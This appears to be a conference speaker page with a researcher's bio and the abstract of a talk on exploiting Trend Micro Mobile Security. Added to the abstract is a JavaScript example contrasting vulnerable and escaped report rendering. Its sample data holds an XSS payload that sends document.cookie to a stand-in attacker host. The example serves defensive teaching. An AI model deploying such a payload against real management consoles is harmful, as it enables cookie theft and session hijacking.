Lucas Carmo

Lucas Carmo is an offensive security researcher and co-founder of Hakai Security, a Brazilian consultancy focused on red teaming and exploit development. With over eight years of experience, he holds the OSWE, OSWP, and GMOB certifications and has had CVEs assigned for vulnerabilities in products such as Trend Micro Mobile Security, Nagios, PRTG, 3CX, and Centreon. He leads Delta7, Hakai’s research division, guiding vulnerability research across a wide range of environments. Lucas contributes to open-source projects such as the ReconFTW web UI and shares his research through blog posts and talks. Outside of hacking, he is passionate about tattoos and views vulnerability research as a form of digital art.


Session

09-05
16:10
30min
Who Scans the Scanner? Exploiting Trend Micro Mobile Security
Lucas Carmo

Trend Micro Mobile Security (TMMS) is a solution widely trusted by enterprises to defend Android devices. But what if the protection becomes the threat? In this talk, I reveal how the very software meant to secure mobile endpoints can be exploited to compromise them. During my research, I identified three vulnerabilities, two of which have been confirmed by the vendor.

First, I found that TMMS exposes sensitive security reports online without requiring authentication, revealing device data to anyone. Second, I uncovered a persistent stored XSS payload sent from Android agents during scans. This payload executes in the browser of anyone who accesses the report, allowing attackers to inject further malicious scripts. Lastly, I’ll discuss a memory-level manipulation identified during dynamic analysis of the scan routine, which could lead to code execution. These flaws present a high-impact attack surface individually, and a dangerous chain if combined.
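The stored-XSS pattern described above (data reported by a managed device is later rendered in a management console) is illustrated below with an added example. It is not code from the talk, from Hakai, or from Trend Micro: the device record, its field names, the HTML layout and the payload are all constructed for this illustration and say nothing about how TMMS actually formats or stores its reports. The point it demonstrates is that an agent on an enrolled device is an untrusted input source for the server-side report page, so every agent-supplied field has to be escaped for the context it is rendered in.

```javascript
// Added example: a report row rendered from an agent-supplied device record,
// first with the untrusted field concatenated straight into HTML (vulnerable),
// then with HTML escaping applied (hardened). Constructed sample data; not TMMS.

// A device record as a scan agent might report it (constructed sample).
// Only deviceName is attacker-controlled here; it carries an XSS payload.
const SAMPLE_REPORT = {
  deviceId: "dev-0001",
  deviceName: '<img src=x onerror="fetch(\'https://attacker.example/?c=\' + document.cookie)">',
  scanResult: "clean",
};

// Vulnerable renderer: agent data is interpolated into markup unescaped, so a
// crafted deviceName becomes live HTML in the browser of whoever opens the report.
function renderReportVulnerable(report) {
  return `<tr><td>${report.deviceId}</td><td>${report.deviceName}</td><td>${report.scanResult}</td></tr>`;
}

// Escape the characters that can break out of HTML text or a quoted attribute.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Hardened renderer: every agent-supplied field passes through escapeHtml, so the
// payload is displayed as text instead of being parsed as a tag.
function renderReportHardened(report) {
  return `<tr><td>${escapeHtml(report.deviceId)}</td><td>${escapeHtml(report.deviceName)}</td><td>${escapeHtml(report.scanResult)}</td></tr>`;
}

// Test oracle: which element names appear in the output beyond the ones the
// template itself emits? Anything else was smuggled in through agent data.
function injectedTagNames(html, allowed = ["tr", "td"]) {
  const names = [];
  for (const match of html.matchAll(/<([a-z][a-z0-9]*)/gi)) {
    const name = match[1].toLowerCase();
    if (!allowed.includes(name)) names.push(name);
  }
  return names;
}

// Stand-alone run: show both outputs and what the oracle finds in each.
console.log("vulnerable:", renderReportVulnerable(SAMPLE_REPORT));
console.log("  injected tags:", injectedTagNames(renderReportVulnerable(SAMPLE_REPORT)));
console.log("hardened:  ", renderReportHardened(SAMPLE_REPORT));
console.log("  injected tags:", injectedTagNames(renderReportHardened(SAMPLE_REPORT)));
```

Escaping at render time is the minimum fix; a practitioner reviewing a console like this would also want the server to validate agent-submitted fields against an expected shape (length, character set) at ingestion, and a Content-Security-Policy on the report pages so that a missed escape does not immediately become script execution.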

This presentation includes recorded demos and a deep dive into the methodology used to discover these issues. It is tailored for red teamers, offensive security professionals, and researchers focused on mobile and infrastructure security.

Track 2